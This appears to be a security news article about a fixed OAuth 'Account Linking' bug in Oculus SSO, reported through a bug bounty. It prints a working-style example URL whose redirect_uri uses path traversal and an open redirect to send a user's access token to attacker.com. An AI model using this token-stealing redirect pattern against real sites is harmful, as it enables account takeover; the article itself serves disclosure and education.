Oculus Account Takeover: Oculus SSO “Account Linking” Bug Exposes Users to Account Takeover
Oculus Account Takeover – A critical security vulnerability in Oculus’s “Account Linking” feature, discovered by bug hunter Youssef Sammouda, has put users at risk of account takeover on third-party websites and VR games/apps. The bug, reported on February 26, 2021, was acknowledged by Facebook on March 2, 2021, and fixed on March 16, 2021.
The vulnerability allowed attackers to manipulate the callback endpoint, redirecting the Oculus access token to their own website, potentially leading to account takeover. This was possible due to a lack of exact matching of values in the redirect_uri parameter and the organization’s SSO settings, as well as inadequate filtering of characters.
To exploit this bug, an attacker could modify the redirect_uri parameter, for example, from:
https://auth.oculus.com/sso/?redirect_uri=https://forums.oculusvr.com/hucou38897/plugins/custom/facebook/fboculus/custom.oauthsso-redirect&organization_id=695304644729285
to:
https://auth.oculus.com/sso/?redirect_uri=https://forums.oculusvr.com/hucou38897/plugins/custom/facebook/fboculus/custom.oauthsso-redirect/../../../../../../open_redirect?next=https://www.attacker.com&organization_id=695304644729285
The access token would then be sent to the attacker’s website, allowing them to login to the user’s Oculus account and potentially access other linked accounts in VR games and apps.
Sammouda notes that this type of bug is common in OAuth authentication flows and emphasizes the importance of checking for small and common issues before looking for complex ones. Facebook has since fixed the issue and awarded Sammouda a $12000 bounty, including a bonus, for his discovery.
This incident highlights the importance of thorough security testing and responsible disclosure in ensuring the safety and security of users’ accounts. By working together with security researchers like Sammouda, companies can identify and address vulnerabilities before they can be exploited by malicious actors.
Link to read full write up: https://ysamm.com/?p=697
Save the PDF here